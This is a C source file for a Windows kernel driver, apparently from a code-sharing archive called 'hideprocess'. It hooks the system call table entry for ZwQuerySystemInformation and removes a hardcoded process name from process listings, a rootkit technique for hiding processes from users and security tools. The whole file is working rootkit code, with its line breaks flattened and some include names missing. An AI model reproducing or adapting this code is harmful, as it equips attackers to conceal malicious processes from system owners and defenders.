www.pudn.com > hideprocess.rar > WinHook.c
/* ****************************************************************** Name:WinHook.c Hook System Service Call In Windows 2000 or later version,Only for x86 CPU.This Driver Only hide process that you setting! Copyright (C) ndis 2004, All rights reserved. ****************************************************************** */ #include#include "WinHook.h" /* ****************************************************************** Macro for easy hook/unhook. On X86 implementations of Zw* func- tions, the DWORD following the first byte is the system call number, so we reach into the Zw function passed as a parameter, and pull the number out. This makes system call hooking depe ndent ONLY on the Zw* function implementation not changing. ****************************************************************** */ #define SYSCALL(_function) ServiceTable->ServiceTable[*(PULONG)((PUCHAR)_function+1)] /* Pointer to system global service table */ PSRVTABLE ServiceTable; #pragma code_seg("ENTRY") /* Driver Entry */ NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath) { NTSTATUS nRet; PDEVICE_OBJECT lpHookDeviceObject; UNICODE_STRING uszDeviceName,uszDriverName; RtlInitUnicodeString(&uszDeviceName,L"\\Device\\WinHook"); RtlInitUnicodeString(&uszDriverName,L"\\DosDevices\\WinHook"); nRet = IoCreateDevice( DriverObject, 0, &uszDeviceName, FILE_DEVICE_WINHOOK, 0, TRUE, &lpHookDeviceObject ); if(NT_SUCCESS(nRet)){ /* Create Symboliclink for GUI */ nRet = IoCreateSymbolicLink (&uszDriverName, &uszDeviceName ); /* Create dispatch points for all routines */ DriverObject->MajorFunction[IRP_MJ_CREATE] = DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] = DriverObject->MajorFunction[IRP_MJ_CLOSE] = DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DriverDispatch; DriverObject->DriverUnload = DriverUnload; } if(!NT_SUCCESS(nRet)){ DbgPrint("******WinHook:Failed to create device!******\n"); if(lpHookDeviceObject){ IoDeleteDevice(lpHookDeviceObject); } IoDeleteSymbolicLink(&uszDriverName); return nRet; } /* Pointer to system table data structure is an NTOSKRNL export */ ServiceTable = KeServiceDescriptorTable; DbgPrint("WinHook:SystemCallService: %x\n",ServiceTable); /* Install System Call Hook */ HookSystemCall(); DbgPrint("******WinHook:Hook System Call Service******\n"); return STATUS_SUCCESS; } #pragma code_seg() #pragma code_seg("SETHOOK") /* Install System Call Hook */ VOID HookSystemCall() { RealZwQuerySystemInformation = SYSCALL(ZwQuerySystemInformation); SYSCALL(ZwQuerySystemInformation) = (PVOID)HookZwQuerySystemInformation; return; } #pragma code_seg() #pragma code_seg("UNHOOK") /* Uninstall System Call Hook */ VOID UnhookSystemCall() { SYSCALL(ZwQuerySystemInformation) = (PVOID)RealZwQuerySystemInformation; return; } #pragma code_seg() #pragma code_seg("HOOK") /* Hook function,hook ZwQuerySystemInformation for hide process you setting. */ NTSTATUS HookZwQuerySystemInformation( IN ULONG SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength ) { NTSTATUS nRet; UNICODE_STRING uszProcName; RtlInitUnicodeString(&uszProcName, L"winlogon.exe"); nRet = (RealZwQuerySystemInformation)( SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength ); if(NT_SUCCESS(nRet)) { if(SystemInformationClass==5) { struct _SYSTEM_PROCESSES *lpCurr = (struct _SYSTEM_PROCESSES *)SystemInformation; struct _SYSTEM_PROCESSES *lpPrev = NULL; if(lpCurr->NextEntryDelta){ ((char *)lpCurr += lpCurr->NextEntryDelta); } while(lpCurr) { /* Hide the process you setting */ if (RtlCompareUnicodeString(&uszProcName, &lpCurr->ProcessName, 1) == 0) { if(lpPrev) { if(lpCurr->NextEntryDelta) { lpPrev->NextEntryDelta += lpCurr->NextEntryDelta; } else { lpPrev->NextEntryDelta = 0; } } else { if(lpCurr->NextEntryDelta) { (char *)SystemInformation += lpCurr->NextEntryDelta; } else { SystemInformation = NULL; } } if(lpCurr->NextEntryDelta){ ((char *)lpCurr += lpCurr->NextEntryDelta); } else { lpCurr = NULL; break; } } /* if (RtlCompareUnicodeString(&uszProcName, &lpCurr->ProcessName, 1) == 0) */ /* View all over the process list */ if(lpCurr != NULL) { lpPrev = lpCurr; if(lpCurr->NextEntryDelta){ ((char *)lpCurr += lpCurr->NextEntryDelta); } else{ lpCurr = NULL; } } } /* end while(lpCurr) */ } /* End if(SystemInformationClass==5) */ } /* End if(NT_SUCCESS(nRet)) */ return nRet; } #pragma code_seg() #pragma code_seg("PATCH") /* Driver Dispatch */ NTSTATUS DriverDispatch(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp) { PIO_STACK_LOCATION lpIrpStack; Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; /* Get a pointer to the current location in the Irp. */ lpIrpStack =IoGetCurrentIrpStackLocation(Irp); switch (lpIrpStack->MajorFunction) { case IRP_MJ_CREATE: case IRP_MJ_SHUTDOWN: case IRP_MJ_CLOSE: case IRP_MJ_DEVICE_CONTROL: DbgPrint("WinHook Dispatch\n"); break; } IoCompleteRequest(Irp,IO_NO_INCREMENT); return STATUS_SUCCESS; } #pragma code_seg() #pragma code_seg("UNLOAD") /* Driver Unolad */ VOID DriverUnload(IN PDRIVER_OBJECT DriverObject) { UNICODE_STRING uszDriverName; DbgPrint("******WinHook Driver Unloading******\n"); /* Uninstall System Call Hook */ UnhookSystemCall(); /* Delete the symbolic link for this device */ RtlInitUnicodeString(&uszDriverName,L"\\DosDevices\\WinHook"); IoDeleteSymbolicLink(&uszDriverName); /* Delete the device object */ IoDeleteDevice( DriverObject->DeviceObject ); DbgPrint("******Deleted devices******\n"); return; } #pragma code_seg()